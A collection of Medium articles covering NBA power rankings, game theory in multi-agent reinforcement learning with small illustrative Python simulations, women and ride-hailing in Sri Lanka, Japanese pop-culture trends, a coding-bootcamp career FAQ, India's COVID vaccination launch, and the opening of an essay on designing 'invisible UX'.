Denver will look to build on a successful playoff run that ended in the conference finals. With Denver unwilling to pay the 6'8 forward, Jerami Grant departed the Mile High City for Detroit. Denver, led by the talented duo of Jamal Murray and Nikola Jokic, has high expectations for 2021. Nuggets fans will also be excited about F Michael Porter Jr., who played his best professional basketball in the Bubble. Expect Denver to contend for a place in the 2021 NBA Finals.
5. Miami Heat
19–20 Record: 44–29 (5th in East)
While Miami fell short of completing their Cinderella story and winning their 4th NBA title, they certainly surpassed any expectations. They signed defensive stud Avery Bradley to complement an already sound defensive lineup led by G Jimmy Butler and C Bam Adebayo, who signed a max extension this offseason. G Tyler Herro will be a key offensive piece again this season after an impressive showing in the Bubble. However, don’t be too bullish on the Heat, as it will be hard for them to replicate such success in a rejuvenated and improved Eastern Conference.
4. Milwaukee Bucks
19–20 Record: 56–17 (1st in East)
Oh, Milwaukee. It seems as if every year we find ourselves back in the same spot- The Bucks steamroll through the regular season and then get prematurely bounced in the playoffs. Anyhow, coming into the season, the Bucks are no doubt one of the best clubs. Fans will be anxious to see how the team performs throughout the year after a failed trade attempt for F Bogdan Bogdanovic and no word on a contract extension for reigning MVP Giannis Antetokounmpo. No matter the regular season success in 2021, all eyes will be on Milwaukee come playoff time as the Bucks try to desperately shake their poor playoff form in hopes of convincing the Greek Freak to stay put.
3. Brooklyn Nets
19–20 Record: 35–37 (7th in East)
Yes, I have the Nets at 3. Brooklyn will have everyone’s attention as arguably the best player in the league, Kevin Durant, makes his return to the hardwood after 18 months. It will also be the first time we see KD and Kyrie Irving playing together. The Steve Nash hire also adds another interesting dynamic to a team that will compete in thirteen nationally televised games, the third-most in the league. Everything looks good on paper, but only time will tell how well the new-look Nets will work. When you have KD and Kyrie, complemented by a defensive anchor like DeAndre Jordan, it can’t be that bad, right? The Nets come in at №3 heading into the season.
Nationally televised games per team, for the 20–21 season.
2. L.A Clippers
19–20 Record: 49–23 (2nd in West)
After a disastrous blown 3–1 lead to the Denver Nuggets in the Western Conference semifinals, it seems as if the Clippers are poised for another go. After extending Paul George, the Clips will be eager to make a deep playoff run in hopes of getting Kawhi Leonard on board long term. L.A. added Serge Ibaka to replace Montrezl Harrell in an effort to remain one of the deepest rosters in the league. New coach Tyronn Lue will look to sort out any remaining locker room and chemistry issues from the previous year. In theory, the Clippers should be in as good a position as any to win the title.
1. L.A Lakers
19–20 Record: 52–19 (1st in West), 2020 NBA Champions
The Lakers have finally regained their glory after LeBron James and Anthony Davis led the purple and gold to their 17th NBA title, tying the Boston Celtics for the most in league history. After the offseason the Lakers had, there is no reason they are not primed for another title run. They re-signed AD to a max deal and added key pieces around the floor, including C Marc Gasol, F Wesley Matthews, and both the Sixth Man of the Year, F Montrezl Harrell, and the runner-up, G Dennis Schroder. With a more talented and younger team around LeBron, the L.A. Lakers head into the new season as the best in the NBA.
Source: https://medium.com/basketball-university/nba-power-rankings-the-top-10-teams-heading-into-the-20-21-season-5fc60183e8d (2020-12-15)
How Modern Game Theory is Influencing Multi-Agent Reinforcement Learning Systems Part II
Mean-Field Games, Evolutionary Games and Stochastic Games are having an impact in the new generation of reinforcement learning systems.
This is the second part of an article discussing new areas of game theory that are influencing deep reinforcement learning systems. The first part focused on types of games that we are actively seeing in multi-agent reinforcement learning systems. Today, I would like to cover three new areas of deep learning theory that can influence new generations of reinforcement learning systems.
Game theory plays a fundamental role in modern artificial intelligence (AI) solutions. Specifically, deep reinforcement learning (DRL) is an area of AI that has embraced game theory as a first-class citizen. From single-agent programs to complex multi-agent DRL environments, game-theoretic dynamics are present across the lifecycle of AI programs. The fascinating thing is that the rapid evolution of DRL has also triggered a renewed interest in game theory research.
The relationship between game theory and DRL is natural. DRL agents learn by regularly interacting with an environment and with other agents (in the case of multi-agent DRL). Incorporating incentives into DRL environments is a very effective way to influence the learning of agents. While most DRL models are still based on traditional game theory concepts such as the Nash equilibrium or zero-sum games, there are new methods that are steadily becoming an important element of AI programs. Let’s explore three new game theory trends that are making inroads into DRL research.
Mean Field Games
Mean-Field Games (MFG) are a relatively new area in the game theory space. MFG theory was developed only in 2006, as part of a series of independent papers published by Minyi Huang, Roland Malhamé and Peter Caines in Montreal, and by Jean-Michel Lasry and Fields medalist Pierre-Louis Lions in Paris. Conceptually, MFG comprises methods and techniques to study differential games with a large population of rational players. These agents have preferences not only about their own state (e.g., wealth, capital) but also about the distribution of the remaining individuals in the population. MFG theory studies generalized Nash equilibria for these systems.
A classic example of MFG is how a school of fish swims in the same direction in a coordinated manner. Theoretically, this phenomenon is really hard to explain, but it has its roots in the fact that each fish reacts to the behavior of the closest group. More specifically, each fish does not care about each of the other fish individually; rather, it cares about how the fish nearby, as a mass, globally move. If we translate that into mathematical terms, the reaction of a fish to the mass is described by the Hamilton-Jacobi-Bellman equation. On the other hand, the aggregation of the actions of the fish, which determines the motion of the mass, corresponds to the Fokker-Planck-Kolmogorov equation. Mean-field game theory is the combination of these two equations.
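To make the fish example concrete, here is a minimal, illustrative simulation (my own toy sketch, not a solver for the actual HJB/FPK system) in the spirit of a Vicsek-style flocking model, where each agent reacts only to the average heading of the agents near it:

```python
import math
import random

def step(headings, positions, radius=1.0, noise=0.1, speed=0.05):
    """One Vicsek-style update: each agent turns toward the mean heading
    of the agents within `radius` of it (its local "mass"), plus noise."""
    n = len(headings)
    new_headings = []
    for i in range(n):
        # Sum unit heading vectors of nearby agents (including self)
        sx = sy = 0.0
        for j in range(n):
            dx = positions[j][0] - positions[i][0]
            dy = positions[j][1] - positions[i][1]
            if dx * dx + dy * dy <= radius * radius:
                sx += math.cos(headings[j])
                sy += math.sin(headings[j])
        new_headings.append(math.atan2(sy, sx) + random.uniform(-noise, noise))
    new_positions = [(x + speed * math.cos(h), y + speed * math.sin(h))
                     for (x, y), h in zip(positions, new_headings)]
    return new_headings, new_positions

random.seed(0)
n = 50
headings = [random.uniform(-math.pi, math.pi) for _ in range(n)]
positions = [(random.uniform(0, 2), random.uniform(0, 2)) for _ in range(n)]
for _ in range(200):
    # radius=5.0 means every fish effectively sees the whole school here;
    # shrink it to make the interaction genuinely local
    headings, positions = step(headings, positions, radius=5.0)

# Order parameter: length of the mean unit-velocity vector
# (0 = random directions, 1 = perfect alignment)
ox = sum(math.cos(h) for h in headings) / n
oy = sum(math.sin(h) for h in headings) / n
order = math.hypot(ox, oy)
print(round(order, 2))  # close to 1.0: the school ends up swimming together
```

Each fish responds to the aggregate, not to individuals, which is exactly the mean-field idea; the HJB and FPK equations are the continuum limit of this kind of individual-reacts-to-mass loop.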
From the DRL standpoint, MFG plays an interesting role in large-scale environments with a large number of agents. Until now, DRL methods have proven impractical in environments with a near-infinite number of agents, given that they would be forced to operate with inexact probabilistic models. MFG is an interesting approach to modeling those DRL environments. AI research startup Prowler recently did some work evaluating MFG in large, multi-agent DRL environments.
Stochastic Games
Stochastic games date back to the 1950s and were introduced by Nobel Prize-winning economist Lloyd Shapley. Conceptually, stochastic games are played by a finite number of players on a finite state space. In each state, each player chooses one of finitely many actions; the resulting profile of actions determines a reward for each player and a probability distribution on successor states.
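That definition maps almost directly onto code. The sketch below is a hedged illustration of a tiny two-player stochastic game; the states, actions, rewards, and transition probabilities are all invented for the example:

```python
import random

# A minimal two-player stochastic game in Shapley's sense: in each state,
# the joint action profile determines per-player rewards and a probability
# distribution over successor states. All numbers are made up.
STATES = ["calm", "contested"]
ACTIONS = ["cooperate", "defect"]

# (state, action1, action2) -> ((reward1, reward2), {next_state: probability})
GAME = {
    ("calm", "cooperate", "cooperate"): ((3, 3), {"calm": 0.9, "contested": 0.1}),
    ("calm", "cooperate", "defect"):    ((0, 5), {"contested": 1.0}),
    ("calm", "defect", "cooperate"):    ((5, 0), {"contested": 1.0}),
    ("calm", "defect", "defect"):       ((1, 1), {"contested": 1.0}),
    ("contested", "cooperate", "cooperate"): ((2, 2), {"calm": 0.5, "contested": 0.5}),
    ("contested", "cooperate", "defect"):    ((0, 3), {"contested": 1.0}),
    ("contested", "defect", "cooperate"):    ((3, 0), {"contested": 1.0}),
    ("contested", "defect", "defect"):       ((0, 0), {"contested": 1.0}),
}

def step(state, a1, a2):
    """Play one stage game and sample the successor state."""
    (r1, r2), dist = GAME[(state, a1, a2)]
    next_state = random.choices(list(dist), weights=list(dist.values()))[0]
    return r1, r2, next_state

random.seed(1)
state, total1, total2 = "calm", 0, 0
for _ in range(100):
    a1, a2 = random.choice(ACTIONS), random.choice(ACTIONS)  # random policies
    r1, r2, state = step(state, a1, a2)
    total1 += r1
    total2 += r2
print(total1, total2)
```

This state-reward-transition loop is exactly the interface a multi-agent DRL algorithm would learn from; replacing the random policies with learned ones is the reinforcement learning part.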
A classic form of stochastic games is the dining philosophers problem, in which there are n + 1 philosophers (n ≥ 1) sitting at a round table with a bowl of rice in the middle. Between any two philosophers who sit next to each other lies a chopstick, which can be accessed by both of them. Since the table is round, there are as many chopsticks as there are philosophers. To eat from the bowl, a philosopher needs to acquire both of the chopsticks he has access to. Hence, if one philosopher eats, then his two neighbors cannot eat at the same time. The life of a philosopher is rather simple and consists of thinking and eating; to survive, a philosopher needs to think and eat again and again. The task is to design a protocol that allows all of the philosophers to survive.
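One well-known protocol that meets this requirement is to break the symmetry of the circle: number the chopsticks globally and have every philosopher pick up the lower-numbered chopstick first, which rules out the circular wait that causes deadlock. A simplified Python sketch (philosophers eat a fixed number of rounds rather than forever):

```python
import threading

# Dining philosophers with ordered lock acquisition: each philosopher
# grabs the lower-numbered chopstick first, so a circular wait (and
# therefore deadlock) is impossible.
N = 5  # philosophers 0..N-1; philosopher i uses chopsticks i and (i+1) % N
chopsticks = [threading.Lock() for _ in range(N)]
meals = [0] * N  # each index written only by its own philosopher thread

def philosopher(i, rounds=3):
    left, right = i, (i + 1) % N
    first, second = min(left, right), max(left, right)  # global ordering
    for _ in range(rounds):
        with chopsticks[first]:
            with chopsticks[second]:
                meals[i] += 1  # eating
        # thinking happens here, between meals

threads = [threading.Thread(target=philosopher, args=(i,)) for i in range(N)]
for t in threads:
    t.start()
for t in threads:
    t.join()
print(meals)  # -> [3, 3, 3, 3, 3]: every philosopher survived all rounds
```

Note this guarantees deadlock freedom but not fairness; a full stochastic-game treatment would also reason about randomized strategies and long-run starvation.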
Stochastic games are already being used in DRL solutions for multi-player games. In many multi-player environments, teams of AI agents need to evaluate how to collaborate with and compete against each other in order to maximize positive outcomes. This is often known as the exploration-exploitation dilemma. Building stochastic game dynamics into DRL agents is an efficient way to balance the exploration and exploitation capabilities of DRL agents. DeepMind’s work mastering Quake III incorporates some of these stochastic game concepts.
Evolutionary Games
Evolutionary Game Theory(EGT) draws inspiration from the Darwinian theory of evolution. The origins of EGT can be traced back to 1973 with John Maynard Smith and George R. Price’s formalization of contests, analyzed as strategies, and the mathematical criteria that can be used to predict the results of competing strategies. Conceptually, EGT is the application of game theory concepts to situations in which a population of agents with diverse strategies interact over time to create a stable solution, through an evolutionary process of selection and duplication. The main idea behind EGT is that many behaviors involve the interaction of multiple agents in a population, and the success of any one of these agents depends on how its strategy interacts with that of others. While classic game theory has been focused on static strategies, that is to say, strategies that do not change over time, evolutionary game theory differs from classical game theory in focusing on how strategies evolve over time and which kind of dynamic strategies are most successful in this evolutionary process.
A classic example of EGT is the Hawk-Dove Game, which models a contest between a hawk and a dove over a shareable resource. In the game, each contestant follows exactly one of the two strategies described below:
· Hawk: Initiate aggressive behavior, not stopping until injured or until one’s opponent backs down.
· Dove: Retreat immediately if one’s opponent initiates aggressive behavior.
If we assume that (1) whenever two individuals both initiate aggressive behavior, conflict eventually results and the two individuals are equally likely to be injured, (2) the cost of the conflict reduces individual fitness by some constant value C, (3) when a Hawk meets a Dove, the Dove immediately retreats and the Hawk obtains the resource, and (4) when two Doves meet the resource is shared equally between them, the fitness payoffs for the Hawk-Dove game can be summarized according to the following matrix:
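The matrix itself appears to have been lost from this copy of the article; in the standard formulation (writing V for the value of the resource), the row player receives (V - C)/2 against a Hawk and V against a Dove when playing Hawk, and 0 against a Hawk and V/2 against a Dove when playing Dove. As an illustrative sketch with my own toy numbers (not from the original article), the replicator dynamic over this matrix can be simulated in a few lines; with V = 2 and C = 4 the population settles at the mixed equilibrium p* = V/C, i.e. 50% Hawks:

```python
# Discrete-time replicator dynamics for the Hawk-Dove game.
# V = value of the resource, C = cost of injury (illustrative numbers
# with C > V, so the stable equilibrium is a mixed population).
# A constant background fitness B keeps fitnesses positive, which the
# discrete replicator update requires; it does not move the equilibrium.
V, C, B = 2.0, 4.0, 2.0

def fitnesses(p):
    """Expected fitness of each strategy when a fraction p plays Hawk."""
    f_hawk = B + p * (V - C) / 2 + (1 - p) * V   # vs Hawk, vs Dove
    f_dove = B + (1 - p) * V / 2                  # 0 vs Hawk, V/2 vs Dove
    return f_hawk, f_dove

p = 0.9  # start with a Hawk-heavy population
for _ in range(1000):
    f_hawk, f_dove = fitnesses(p)
    f_avg = p * f_hawk + (1 - p) * f_dove
    p = p * f_hawk / f_avg  # a strategy's share grows with its relative fitness

print(round(p, 2))  # -> 0.5: the mixed equilibrium at p* = V / C
```

This is the "selection and duplication" process the article describes: strategies that do better than the population average spread, and the Hawk fraction converges to the point where Hawks and Doves do equally well.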
EGT seems to have been designed with DRL environments in mind. In multi-agent DRL environments, agents regularly modify their strategies by interacting with each other. EGT is an effective way to model those interactions. Recently, OpenAI showed some of those dynamics when training agents to play a game of hide-and-seek.
Source: https://medium.com/dataseries/how-modern-game-theory-is-influencing-multi-agent-reinforcement-learning-systems-part-ii-4f47166d0fe6 (Jesus Rodriguez, 2020-06-26)
The Race is On for Women Ride-hailing Customers in Sri Lanka
By Henriette Kolb and William Sonneborn
Few industries have been impacted by the COVID-19 pandemic more than the transport industry. Both the public and private sector, including ride-hailing, are looking for solutions that will ensure a sustainable future. To ensure a resilient recovery from the pandemic and the opportunity to thrive, it is essential for companies not only to create safe travel options, but also to attract customers who haven’t previously used tech-based transport.
A new International Finance Corporation (IFC) study conducted with the Sri Lankan ride-hailing company PickMe and IFC’s development partner, the Australian Department of Foreign Affairs and Trade (DFAT), suggests that ride-hailing platforms should look to an important, but often underserved, market: women. The report finds that annual revenues could increase by over a quarter if the differences between women and men in the percentage of riders and the frequency of rides were closed. We found that while existing women riders in Sri Lanka are more likely than men to depend on ride-hailing to cover basic transport needs, they take fewer trips overall because they are less likely to join the workforce or go out at night.
These barriers are not easily overcome. However, IFC is increasingly seeing a “race to the top” as companies across the industry invest in solutions that bring women riders and drivers into the market.
PickMe has established a dedicated team with the mandate to recruit, retain, and support women drivers, a key to attracting women riders. PickMe reported that many women register to drive but end up dropping out, and found that a personal touch, through the dedicated team, builds the connections that enable women to stay on the platform over time.
Recently, the PickMe platform has gone a step further by rolling out products designed to support women. For instance, the app adjusted its rider-driver matching algorithm so that if a man and a woman driver were to be equidistant from a potential courier pick-up, the woman driver would receive the trip. The company also piloted a “Lady First” option where women riders had the option to select a woman driver. Coupled with solutions like a 24-hour hotline, PickMe hopes to attract more women, who remain widely underrepresented in ride-sharing and in transport work more broadly, to join the sector.
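As a purely hypothetical sketch (not PickMe’s actual algorithm or code), a tie-break of this kind can be expressed as a two-level sort key: rank drivers by distance, and break near-ties in favor of women drivers:

```python
# Hypothetical illustration of a distance-based driver match with a
# tie-break favoring women drivers. Driver data and the eps threshold
# are invented for the example.
def match_driver(drivers, eps=0.05):
    """drivers: list of (driver_id, distance_km, gender).
    Pick the closest driver, treating distances within eps km of each
    other as equal and resolving those ties toward women drivers."""
    return min(drivers, key=lambda d: (round(d[1] / eps), 0 if d[2] == "F" else 1))

drivers = [("d1", 1.20, "M"), ("d2", 1.22, "F"), ("d3", 2.10, "M")]
print(match_driver(drivers))  # -> ('d2', 1.22, 'F'): the near-tie goes to the woman driver
```

The design point is that the change is tiny and local: the ranking still optimizes pickup time, and the preference only activates when drivers are effectively equidistant.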
Other effective approaches include working with employers to develop transport partnerships and continuously innovating on safety and security measures.
Solutions like these can also have a strong social impact in markets like Sri Lanka, where limited access to transport has been consistently linked to low female labor force participation rates. In surveys, 64 percent of women PickMe riders said that they can access more or better jobs thanks to ride-hailing, and 88 percent said ride-hailing gives them access to new places. This finding reinforces IFC’s previous research in six countries showing that women with access to ride-hailing reported increased mobility, even women who were affluent or had multiple transport options.
As markets around the world face the challenge of responding to the COVID-19 pandemic, a call has gone out for a resilient recovery to ensure that our economies grow back stronger, greener, and more equal than the ones we had before. The private sector can, and should, play a key role in addressing the recent rise in gender inequality. Safe, affordable, and accessible transportation is a central element of that recovery. By designing for women, ride-hailing can drive change for the better.
To learn more about women and ride-hailing join IFC’s roundtable with PickMe, Uber, and Bolt on December 9 or check out the following resources:
· Women and Ride-hailing in Sri Lanka (Report)
· Driving toward equality: Women, ride-hailing, and the sharing economy (Report)
· Gender-segregated transport in ride-hailing: Navigating the debate (Report)
· Will women return to ride-hailing after the coronavirus pandemic? (Blog)
· Five things a global study on ride-hailing tells us about women and the sharing economy (Blog) | https://medium.com/@ifc-org/the-race-is-on-for-women-ride-hailing-customers-in-sri-lanka-d67f4ed7d587 | [] | 2020-12-07 19:53:27.202000+00:00 | ['Sri Lanka', 'Ride Hailing', 'Women In Business', 'Women', 'Ridesharing'] |
Changing Trends in Japanese Pop Culture
Japan is well-known for being a trendsetter, developing popular media, games, and other ideas and concepts that rapidly work their way into Western culture. Staying one step ahead of these trends means keeping a close eye on developments in the country. If you’re interested in learning more about what is coming out of Japan and what you may be looking forward to as we approach the new year, here are a few changing trends in Japanese pop culture worth paying attention to.
Photo by Jezael Melgoza on Unsplash
Itasha: Expressing Individuality Through Car Culture
Itasha is a term that refers to cars that have been heavily decorated with characters and logos stemming from popular anime and manga, often with an emphasis on featuring female characters hailing from the individual series that the car owners are interested in. A way to express individuality, the level of decorations may vary from person to person. For example, some people may only have the outside of the car painted, while others will go all out and include peeling stickers, air fresheners, and even license plate frames. You may even find some cars that have been heavily modified with exciting light displays, massive speakers, and expensive merchandise adorning both the interior and the exterior of the vehicle.
If you’re a lover of any manga or anime, this is absolutely one trend you’ll want to get behind as you may be able to find others who share your passion or even attend an event filled with itasha, itansha, and itachari!
Embracing Fashion
Photo by Alex Sheldon on Unsplash
Many will wear otaku clothing (otaku is a term used to refer to what we would call geek culture) to represent their favorite character. It’s a fun way to express your style and personality, and it’s perfect for everyday wear.
You can also take it a step further by exploring cosplay. This is when you dress and act like the character. Depending on the anime, you may be able to wear a complete outfit that looks just like the anime without anyone even realizing you’re playing a character.
A Return to Retro Gaming
Much of the gaming that has permeated Western culture was developed in Japan, and like many things, games tend to come back into fashion once a couple of decades have passed. As a result, retro gaming seems to be making a comeback in Japan, with popular titles like Super Mario Bros and Donkey Kong as well as once-obsolete gaming systems like the NES or the Super NES becoming popular once again. Whether it’s in the home or in gaming arcades or cafes, don’t be surprised if you see some of your favorite old games make an appearance in your life again.
Vegetarian Food
Interestingly enough, some of the health and food trends that became quite popular in the West are now moving to the East, despite the fact that we’ve seen quite a few food trends rise from the East in past years (take, for example, foods and drinks like boba tea or fluffy pancakes, both of which have taken the West by storm).
Arguably two of the biggest trends taking hold of Japan are vegetarian food and intermittent fasting. Despite the fact that vegetarian food is by no means a new development, it wasn’t something that was very popular in Japan until recently, which is largely due to the fact that meat is a staple in many Japanese meals and is not as problematic as it has become in Western culture. Now, more and more small restaurants are beginning to experiment with these types of meals, offering interested customers the ability to eat meals with meat substitutes and focus more on dishes that offer more vegetables than a traditional dish would.
Intermittent Fasting
Intermittent fasting is another concept that has grown in popularity in the West (much more recently than vegetarianism, however) but also hasn’t really made as much of an impact on the rest of the world as it has in America. Now, the one-day diet seems to be making its rounds throughout Japan, especially for those who are only looking to lose a little weight by consuming only liquids for 24 hours. While this may not be a trend that’s as impactful as the others listed above, it’s definitely interesting to see it play out as more people begin to adopt this kind of diet.
As cultures change and grow, trends come and go as well. Keeping tabs on these trends as they develop lets you see which ones may take hold in your own country, as well as which trends that developed elsewhere are now impacting other countries, such as the examples from Japan listed above. Whatever your reason for being interested in these new Japanese trends, this article will help introduce you to some trends that may be new to you as well as some that you may already be familiar with!
Source: https://medium.com/all-about-surrounding/changing-trends-in-japanese-pop-culture-f6ab301e299d (Tess Dinapoli, 2020-12-24)
How I Successfully Changed Careers to Software Engineering with a Coding Bootcamp
Frequently Asked Questions
“What advice can you give me as a job seeker in tech?”
Well first I would say “google it”. I can’t tell you how to live your life exactly, but if you’re already doing basic things like writing quality cover letters and have worked on your resume (and have gotten it critiqued by friends, family, professionals), then maybe these 4 tips might help you go further:
If you couldn’t tell from my experience, GO TO HACKATHONS! They are an amazing experience (not to mention all the free swag), and if you can’t go to one then I encourage you to make your own hackathon by setting aside a couple of days of solid work and a lot of snacks and see what you can accomplish.
Have a portfolio to showcase your work to employers that describes each project you’ve work on, as well as a tailored LinkedIn profile.
Go on Meetup and join a coding group like your local chapter of Code for America, or sign up for a networking or informational event. (At the time of writing this, the COVID pandemic has decreased the number of these events, but many of them are still happening virtually!)
Start working on your next project. Either have it be a personal project or find a group to collaborate with, but you should always be working on something to keep your skills sharp and so you have something current to talk about during an interview.
“Would you recommend General Assembly?”
HECK YES (the Boston location at least).
As I said before, I know nothing about other GA locations. They each have different curriculum, teachers, and staff. If you’re looking at a GA location besides Boston, I would recommend visiting them and checking out the space and curriculum for yourself, as well as asking about how GA experience is viewed in that location’s job market. That being said, I have no reason to believe that other locations are not excellent, I just do not claim to know that they are for sure.
Without the teachers and staff at GA Boston, I do not think I ever could have made such a successful career transition. (Okay, maybe not ever, but I sure as hell couldn’t have done it in under a year.)
“I’m considering a bootcamp… is it right for me?”
There are a lot of options to take into consideration when deciding whether or not to enroll in a bootcamp. One big consideration is finances: is it worth it for you to spend the money on the bootcamp, and how much do you think your salary is going to change in order to offset that cost? For me, the increase in salary over the course of one year would be enough to cover the cost, so in my case the cost of the bootcamp seemed justified. Also consider whether the bootcamp cost is something your company will cover if you’re already in a similar industry, or if your company will hire you back in a different position once you complete the course.
Another major factor is your overall happiness. Look into why you’ve considered tech in the first place… is it something you actually like or are you just doing it for the salary and perks? If you can’t stand getting frustrated by bugs or don’t enjoy learning new things all the time, then maybe you need to reconsider. Really make sure that this is something you like to do, or at the very least can tolerate it so that you’re not miserable. If you’re already in a technical role, such as mechanical engineering, then maybe software engineering won’t be that much of a leap for you. If you have no technical background (like me, hello), then I suggest you really make sure you try out a good amount of online learning for a while before you quit your job and drop a ton of money on a career change.
“Can I get a job in software without going to a bootcamp?”
Of course! Lots of people do. But you have to have a lot of self-discipline, time, and patience. One of the things I love most about coding is that you can learn almost everything online somewhere for free if you search for it. It’s insanely more accessible than most fields, and can be a great hobby too if you’re just looking to try it out and gain some additional skills.
“Am I smart enough to be a software engineer?”
I don’t know you, but you probably are. The majority of people in my ~30 person cohort figured everything out and finished hard projects; you can too. I do not consider myself a traditionally “smart” person, meaning I don’t usually see something and just get it or remember it, but I do work hard and I’m passionate about learning.
Women in particular ask themselves this question a lot, and I admit that I did too at first (jk, I still do some days). Girls at a young age are often conditioned by society to think that they should be automatically good at everything, so when they try something new and aren’t great at it, they typically just give up and move on (or even worse, they just don’t try at all). It’s because of that early conditioning that we see so many fewer women in technical roles. One of my greatest realizations in changing careers to software engineering is that it’s okay to be wrong. That’s what error codes are for. You go back, try different things, and see what works.
“How do I split up my time during the job search?”
It’s going to depend a lot on your own schedule, responsibilities, and needs, but I can tell you what worked for me.
40% continued learning: working on projects, online courses and coding challenges for interviews on sites like leetcode or codewars.
30% applying for jobs: searching for openings, completing applications, writing quality (I’ll say it again for all you copy-and-pasters, QUALITY) cover letters. Make sure you keep a spreadsheet of everywhere you’re applying and try to shoot for about 10 quality applications a week, not just that 1-click apply button.
20% networking: going to events either virtually or in person (when that finally becomes a thing again) and reaching out to people in your network to have a coffee or a quick chat about their career or company.
10% self care: the job search is long and tedious, and you can easily wear yourself down in only a couple weeks. I make sure I do at least one thing for self care every day that ranges from 10 minutes to 1 hour, such as reading outside, grabbing a coffee, going for a walk, exercising, putting on a face mask, or trying out a new recipe to cook. In addition to this, something that the career coaches stressed to us was “respect the weekend”, which I did do most of the time (honestly it can be hard to know it’s even the weekend when all your days are the same).
Treat the job search like a full-time job. That means 8 hours a day, 40 hours a week.
“I’m not having any luck finding a job, what should I be doing differently? Should I give up?”
I get it. Maybe it’s been a month into the job search and you haven’t heard back from anyone and you’re ready to throw in the towel. But hang in there and just know that the job search takes time. Our career coaches at GA told us that it’s very rare to get a job right out of the bootcamp, and it usually takes on average around 4 months for most people to get jobs. Be prepared for longer just in case, especially since we are in uncharted waters with the coronavirus pandemic. The job search is not a sprint, it’s a marathon, and you need to pace yourself accordingly to get through it. If you’re not finding any success with what you’re doing, do some research online and try to modify what you’re doing to see if something else works.
If you find yourself in a tricky situation because of finances in a job search that is seemingly endless, I suggest trying to get a part-time job to help pay some bills and keep you busy. Many people find that having the extra responsibility of a part-time job provides more structure and they’re less likely to waste time because they can’t afford to anymore. However, be aware that not treating the job search as a full-time job may lead to an extended job search in the long run.
“What is the interview process like?”
It really depends on the company! For my Red Hat internship, the decision was based on a video call and I only had to answer soft technical questions about some of my projects, no actual coding was involved. For most of my other interviews at different companies I had to do coding challenges either in the form of a take-home challenge or whiteboarding if it was in person. Most of the coding questions, especially whiteboard problems, were problems that would be considered to be at the “easy” level on leetcode.
The general format for the job interview processes I went through was a phone screening first, followed by a take-home challenge, and then an on-site interview, but there are a lot of variations.
“How do I prepare for interviews?”
Do coding challenges EVERY. DAY. Leetcode and Codewars were my favorites to use. Make sure you know how to check if a string is a palindrome.
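Since the palindrome check comes up so often, here is one way to do it (a sketch in Python; interviewers often add twists, like ignoring punctuation and casing, which this version handles):

```python
def is_palindrome(s: str) -> bool:
    # Keep only alphanumeric characters, lowercased, so that
    # "A man, a plan, a canal: Panama" also counts as a palindrome.
    cleaned = [ch.lower() for ch in s if ch.isalnum()]
    return cleaned == cleaned[::-1]

print(is_palindrome("racecar"))                         # True
print(is_palindrome("A man, a plan, a canal: Panama"))  # True
print(is_palindrome("hello"))                           # False
```

Practice explaining the trade-offs out loud too: this version makes a copy of the string, while a two-pointer version uses constant extra space.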
I also watched a lot of YouTube interview practice videos, but I found that these didn’t help me as much as actually trying the problems on my own did. Sometimes I would start a YouTube video, wait to see what the interview problem was, and try to answer it myself; if I got stuck, I would watch only until I could get to the next step of the problem. When I finished solving the problem I would then watch the rest of the video to see how they went about solving it and how my solution differed.
In addition to “hard” technical interview questions, you could also be asked “soft” technical questions (“explain what happens when you google something?”).
Lastly, do not neglect the personality interview questions. Have personal stories prepared in your head that recall a time when you worked on a team, or when you were asked to do something you didn’t agree with… those kinds of questions. Make sure you practice them too so you don’t stumble over words or forget important pieces because you’re nervous.
“Do I need a portfolio?”
Maybe not if you have a college degree backing you up, but it can’t hurt to have one. However, if you’re a career changer like me without that coveted computer science diploma, then I strongly encourage you to make a portfolio (here’s mine for an example).
Unless you’re great at user experience and design, I would suggest you use a template like I did. I purchased mine for only $13, which is about the cost of a fairly average drink at a bar in Boston and a lot more useful. There are also a lot of free templates you can use that are just as good. | https://medium.com/swlh/how-i-successfully-changed-careers-to-software-engineering-with-a-coding-bootcamp-fdc16831221 | ['Regina Scott'] | 2020-06-22 21:44:45.233000+00:00 | ['Coding', 'Job Hunting', 'Bootcamp Experience', 'Software Development', 'Codingbootcamp'] |
coronavirus vaccine news | Live: Corona vaccination begins in the country, Serum CEO Adar Poonawala also took the vaccine
Today, the world’s largest vaccination drive started in India. Prime Minister Narendra Modi launched the corona vaccination campaign through a virtual address, saying that scientists have worked hard to develop the corona vaccine. For a day like this, PM Modi recalled, Rashtrakavi Ramdhari Singh Dinkar had written that when a human exerts full effort, even stone turns to water.
Every Indian proud with unprecedented achievement- Amit Shah
Home Minister Amit Shah also expressed happiness over the introduction of the corona vaccine. Amit Shah said that India is among the few countries that have made winning progress toward ending the biggest crisis facing humanity.
Every Indian is proud of this unprecedented achievement. This is the emergence of a new self-sufficient India on the globe. Many congratulations to all the scientists. Amit Shah said that this ‘new India’ under the leadership of Modi Ji is an India that turns adversity into opportunity and challenges into achievements. This ‘Made in India’ vaccine is a reflection of the resolve of this self-reliant India. On this historic day, I bow to all our Corona warriors.
Designing for invisible UX | Designing for invisible UX
This piece was co-written with Kay Jorgensen.
Content discovery is a big deal right now. For many of us, powerful search experiences and refined recommendations help us plan and move through much of our day.
The tools that power this content discovery are evolving. For product teams, a user’s experience of these tools is becoming synonymous with their experience of their products. As a result, there’s a growing call to design these tools the same way we design the products they’re embedded in.
As content designers, we’ve got lots of practice designing intentional user experiences. The content designers at Shopify have an amazing toolkit of tactics to do this. Typically we talk about using these tactics to build things that merchants control, or at least know they’re using. But we often don’t want merchants to focus on the content discovery tools we embed in products because we want them to focus on the product itself. As two content designers working on search and personalization problems, we struggled to understand how to apply familiar tactics to design the less tangible products that we work on. We refer to our work on these products as invisible UX.
Understanding invisible UX
We developed a framework based on systems thinking principles to break invisible UX projects into pieces that we could define and understand. The framework outlines components that, when combined, form the basis of invisible experiences. The framework is made up of four components: inputs, structure, output, and the interface. Design thinking can be applied to each of them.
Input
The input is the data the system uses to accomplish its intended function. The data could be anything: metrics like sales, visits, or availability of products; or content attributes like product tags and descriptions. The data might also come from an action or behavior, like the act of selecting or creating something, entering information, or abandoning flows. Systems are often built around multiple inputs. In more complex systems, logic and conditions are applied to make meaning out of different kinds of inputs.
Deciding what to use as the input for a system will be dependent on the goals of the project. UX can help identify and define which inputs are relevant by exploring the problem space using UX tactics such as audits.
Structure
The input is organized according to a structure. Structures are principles for organizing your inputs. Designing the structure for a system involves things like defining the sorting logic or conditions. The structure might sort inputs programmatically, like through an algorithm, or manually.
